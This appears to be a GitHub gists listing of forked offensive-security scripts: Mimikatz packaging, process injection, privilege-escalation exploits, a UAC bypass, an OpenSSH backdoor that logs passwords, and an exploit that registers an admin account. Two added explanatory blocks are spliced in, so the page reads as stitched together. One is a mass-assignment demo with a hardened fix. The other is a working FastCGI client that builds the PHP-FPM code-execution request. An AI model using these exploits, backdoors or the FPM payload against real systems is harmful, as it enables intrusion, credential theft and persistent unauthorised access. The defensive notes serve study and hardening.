Public gists of Tomato (@Tom4t0)
Tom4t0 / Invoke-UpdateMimikatzScript.ps1
Created Apr 18, 2019 — forked from ihack4falafel/Invoke-UpdateMimikatzScript.ps1
Convert an x64/x86 powerkatz.dll to a Base64 string and then update the Invoke-Mimikatz.ps1 script from Empire
<#
.Synopsis
Invoke-UpdateMimikatzScript created by Hashim Jawad (@ihack4falafel)
.DESCRIPTION
Convert x64/x86 powerkatz.dll to Base64 string and then update Invoke-Mimikatz.ps1 script from Empire, see the link https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1
.PARAMETER DllPath
Path to powerkatz.dll generated via Visual Studio.
.PARAMETER ScriptPath
Path to Invoke-Mimikatz.ps1 script.
Tom4t0 / inject.c
Created Mar 25, 2019 — forked from hfiref0x/inject.c
Process Doppelgänging
//
// Ref = src
// https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf
//
// Credits:
// Vyacheslav Rusakov @swwwolf
// Tom Bonner @thomas_bonner
//
#include <Windows.h>
Tom4t0 / README.md
Created Feb 21, 2019 — forked from magnetikonline/README.md
Enable LDAP over SSL (LDAPS) for Microsoft Active Directory servers.

Enable LDAP over SSL (LDAPS) for Microsoft Active Directory servers

By default, Microsoft Active Directory servers offer LDAP over unencrypted connections (boo!).

The steps below create a new self-signed certificate suitable for enabling LDAPS on an AD server. The "self-signed" portion of this guide can of course be swapped for a certificate purchased from a real vendor if required.

Steps have been tested successfully with Windows Server 2012 R2, but should work with Windows Server 2008 without modification. Requires a working OpenSSL install (ideally Linux/OSX) and (obviously) a Windows Active Directory server.

Tom4t0 / show_me_the_shell.py
import requests


def register(url):
    reg_url = url + '/doregister.do'
    post_data = {'username': 'admin', 'password': 'admin123', 'repassword': 'admin123', 'isadmin': '1'}
    resp = requests.post(url=reg_url, data=post_data)


def login(url):
    req = requests.Session()
    login_url = url + '/login.do'
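The preview above registers an account while sending isadmin=1 in the same POST body as the username and password. The server side of that application is not on this page, so the handler below is a constructed illustration of the bug class this request pattern exploits (mass assignment of a privilege flag from request parameters), placed next to a hardened version that allow-lists the fields a self-registration may set. This is added example code, not the target application's and not part of the gist; the field names mirror the preview's POST body, the storage is an in-memory dict, and the demo() helper simply runs both handlers against that body.

```python
"""
Constructed example: a registration handler that copies every submitted field
onto the user record (vulnerable) beside one that only accepts an allow-list
of fields and fixes the privilege flag server-side (hardened).
"""
import hashlib
import os

# The exact body the preview POSTs to /doregister.do (taken from the gist).
ATTACKER_FORM = {
    "username": "admin",
    "password": "admin123",
    "repassword": "admin123",
    "isadmin": "1",
}

# Fields a self-service sign-up is allowed to submit. Anything else is an attack
# or a client bug; either way it must not reach the user record.
ALLOWED_REGISTRATION_FIELDS = {"username", "password", "repassword"}


def _hash_password(password: str) -> str:
    """Salted PBKDF2-HMAC-SHA256; stored as hex(salt)$hex(dk)."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt.hex() + "$" + dk.hex()


def _new_record(form: dict) -> dict:
    if form["password"] != form.get("repassword"):
        raise ValueError("passwords differ")
    return {
        "username": form["username"],
        "password_hash": _hash_password(form["password"]),
        "isadmin": "0",          # server-side default: never admin on sign-up
    }


def register_vulnerable(db: dict, form: dict) -> dict:
    """Binds every remaining request field onto the record. An isadmin=1 sent
    by the client silently overwrites the server-side default."""
    user = _new_record(form)
    for key, value in form.items():
        if key not in ("password", "repassword"):
            user[key] = value     # <- isadmin from the wire lands here
    db[user["username"]] = user
    return user


def register_hardened(db: dict, form: dict) -> dict:
    """Rejects any field outside the allow-list before touching the record.
    Dropping and logging the extra fields is the softer alternative; rejecting
    makes the probe visible and leaves no half-trusted state behind."""
    unexpected = set(form) - ALLOWED_REGISTRATION_FIELDS
    if unexpected:
        raise ValueError(f"unexpected registration fields: {sorted(unexpected)}")
    if form["username"] in db:
        raise ValueError("username already taken")
    user = _new_record(form)      # isadmin stays at the server-side default
    db[user["username"]] = user
    return user


def is_admin(user: dict) -> bool:
    return user.get("isadmin") == "1"


def demo() -> dict:
    """Runs the preview's POST body through both handlers, then a legitimate
    sign-up through the hardened one; returns what each produced."""
    vuln_db, hard_db = {}, {}
    vuln_user = register_vulnerable(vuln_db, dict(ATTACKER_FORM))
    try:
        register_hardened(hard_db, dict(ATTACKER_FORM))
        rejected = False
    except ValueError:
        rejected = True
    normal = register_hardened(
        hard_db, {"username": "alice", "password": "pw1", "repassword": "pw1"}
    )
    return {
        "vuln_is_admin": is_admin(vuln_user),
        "hardened_rejected": rejected,
        "hardened_db_untouched_by_attack": set(hard_db) == {"alice"},
        "normal_is_admin": is_admin(normal),
    }


if __name__ == "__main__":
    print(demo())
```

The check worth keeping from this is the first line of register_hardened: the set difference between what arrived and what the endpoint is documented to accept. Frameworks that bind request parameters straight onto a model (the pattern the preview is probing) need that allow-list declared on the model or the form, not discovered after an attacker's isadmin=1 is already persisted.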
Tom4t0 / fpm.py
Created Apr 25, 2017 — forked from phith0n/fpm.py
Fastcgi PHP-FPM Client && Code Execution
import socket
import random
import argparse
import sys
from io import BytesIO
# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client
PY2 = True if sys.version_info.major == 2 else False
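fpm.py is a FastCGI client that talks directly to an exposed PHP-FPM listener; the one-line description says "code execution" but does not show what goes on the wire. The following is an added example, not fpm.py's code and not part of the gist: a minimal FastCGI record encoder and decoder, plus the request a code-execution client builds, in which PHP_VALUE sets auto_prepend_file to php://input and PHP_ADMIN_VALUE enables allow_url_include, so that whatever is sent on FCGI_STDIN is interpreted as PHP. The record layout (8-byte header, name-value length encoding, empty record as end marker) is the FastCGI 1.0 specification; the script path, payload and fake response are constructed sample values, and send_to_fpm is ordinary socket code that the offline checks do not exercise.

```python
"""
Added example: FastCGI record encoding/decoding and the PHP-FPM
code-execution request, constructed independently of fpm.py.
"""
import socket
import struct

FCGI_VERSION_1 = 1
FCGI_BEGIN_REQUEST, FCGI_END_REQUEST, FCGI_PARAMS = 1, 3, 4
FCGI_STDIN, FCGI_STDOUT, FCGI_STDERR = 5, 6, 7
FCGI_RESPONDER = 1


def fcgi_record(rec_type: int, request_id: int, content: bytes) -> bytes:
    """Header: version, type, requestId(BE16), contentLength(BE16),
    paddingLength, reserved; then content and zero padding to 8 bytes."""
    padding = (8 - len(content) % 8) % 8
    header = struct.pack(">BBHHBx", FCGI_VERSION_1, rec_type, request_id,
                         len(content), padding)
    return header + content + b"\x00" * padding


def encode_name_value(name: str, value: str) -> bytes:
    """nameLength, valueLength, name, value. A length below 128 is one byte;
    otherwise four bytes big-endian with the high bit set."""
    n, v = name.encode(), value.encode()
    out = b""
    for length in (len(n), len(v)):
        out += struct.pack(">B", length) if length < 128 \
            else struct.pack(">I", length | 0x80000000)
    return out + n + v


def build_request(params: dict, stdin: bytes, request_id: int = 1) -> bytes:
    begin = struct.pack(">HB5x", FCGI_RESPONDER, 0)     # role, flags, reserved
    out = fcgi_record(FCGI_BEGIN_REQUEST, request_id, begin)
    out += fcgi_record(FCGI_PARAMS, request_id,
                       b"".join(encode_name_value(k, v) for k, v in params.items()))
    out += fcgi_record(FCGI_PARAMS, request_id, b"")    # empty record ends PARAMS
    out += fcgi_record(FCGI_STDIN, request_id, stdin)
    out += fcgi_record(FCGI_STDIN, request_id, b"")     # empty record ends STDIN
    return out


def parse_records(data: bytes) -> list:
    """Inverse of fcgi_record: [(type, request_id, content), ...]."""
    records, off = [], 0
    while off + 8 <= len(data):
        ver, rtype, rid, clen, plen = struct.unpack(">BBHHBx", data[off:off + 8])
        if ver != FCGI_VERSION_1:
            raise ValueError(f"unexpected FCGI version {ver} at offset {off}")
        records.append((rtype, rid, data[off + 8:off + 8 + clen]))
        off += 8 + clen + plen
    return records


def decode_params(content: bytes) -> dict:
    params, off = {}, 0
    while off < len(content):
        lengths = []
        for _ in range(2):
            if content[off] < 128:
                lengths.append(content[off]); off += 1
            else:
                lengths.append(struct.unpack(">I", content[off:off + 4])[0] & 0x7FFFFFFF)
                off += 4
        nlen, vlen = lengths
        params[content[off:off + nlen].decode()] = content[off + nlen:off + nlen + vlen].decode()
        off += nlen + vlen
    return params


def rce_request(script_path: str, php_code: str) -> bytes:
    """The parameter set a PHP-FPM code-execution client sends. script_path must
    be a PHP file that exists on the target (sample value in the test); the
    STDIN body is prepended to it via auto_prepend_file = php://input."""
    body = php_code.encode()
    params = {
        "GATEWAY_INTERFACE": "FastCGI/1.0",
        "REQUEST_METHOD": "POST",
        "SCRIPT_FILENAME": script_path,
        "SCRIPT_NAME": script_path,
        "SERVER_SOFTWARE": "php/fcgiclient",
        "REMOTE_ADDR": "127.0.0.1",
        "SERVER_PROTOCOL": "HTTP/1.1",
        "CONTENT_TYPE": "application/x-www-form-urlencoded",
        "CONTENT_LENGTH": str(len(body)),
        "PHP_VALUE": "auto_prepend_file = php://input",
        "PHP_ADMIN_VALUE": "allow_url_include = On",
    }
    return build_request(params, body)


def fpm_stdout(response: bytes) -> bytes:
    """Concatenates the FCGI_STDOUT payloads (headers + script output)."""
    return b"".join(c for t, _, c in parse_records(response) if t == FCGI_STDOUT)


def send_to_fpm(host: str, port: int, payload: bytes, timeout: float = 5.0) -> bytes:
    """Network path, not exercised offline: ship the request, read until EOF."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        while True:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)
```

Two things the encoder makes visible that the gist description does not: the attack needs nothing from the web server (the client speaks FastCGI straight to port 9000 or the Unix socket, so exposure of that listener is the whole precondition), and the execution primitive is the PHP_VALUE/PHP_ADMIN_VALUE pair, which FPM honours from any client that can reach it. The defensive check is therefore a listener bound only to the web server (listen.allowed_clients, a local socket with tight permissions) rather than anything in the PHP application itself.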
Tom4t0 / Invoke-MS16-135.ps1
function Invoke-MS16-135 {
<#
.SYNOPSIS
PowerShell implementation of MS16-135. The exploit targets all vulnerable
operating systems that support PowerShell v2+.
* Win7-Win10 <== 64 bit!
.PARAMETER Application
Specifies an Application to run.
Tom4t0 / MS17-012.ps1
Function Start-ProcessInSession {
<#
.SYNOPSIS
Start a process in a different session on the same server when MS17-012 is not installed
.DESCRIPTION
Based on the work of James Forshaw
https://bugs.chromium.org/p/project-zero/issues/detail?id=1021
.PARAMETER SessionID
The SessionID where you want to pop a process. Use quser to find all SessionIDs on a terminal server
Tom4t0 / openssh-autobackdoor.bash
Last active Mar 28, 2017 — forked from eyecatchup/openssh-autobackdoor.bash
This script provides OpenSSH backdoor functionality with a magic password and logs passwords as well. It leverages the same basic idea behind common OpenSSH patches, but attempts to make the process version-agnostic. Use at your own risk.
#!/bin/bash
# ============================================
# satyr's openssh autobackdooring doohicky v0.-1
# ImpendingSatyr@gmail.com
# ============================================
# USAGE:
# Run this script with no args and it'll prompt for the "Magic" password and location to log passwords to (incoming and outgoing).
# If you give the location that passwords will be logged to as an arg, this script will try to automate almost everything
# (Like common openssh compiling problems, such as missing pam, kerberos, zlib, openssl-devel, etc.
# [it'll install them via apt or yum, whichever is available]).
Tom4t0 / DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links
Tom4t0 / UAC-bypass.ps1
function Invoke-EventVwrBypass {
<#
.SYNOPSIS
Bypasses UAC by performing an image hijack on the .msc file extension
Expected to work on Win7, 8.1 and Win10
Only tested on Windows 7 and Windows 10
Author: Matt Nelson (@enigma0x3)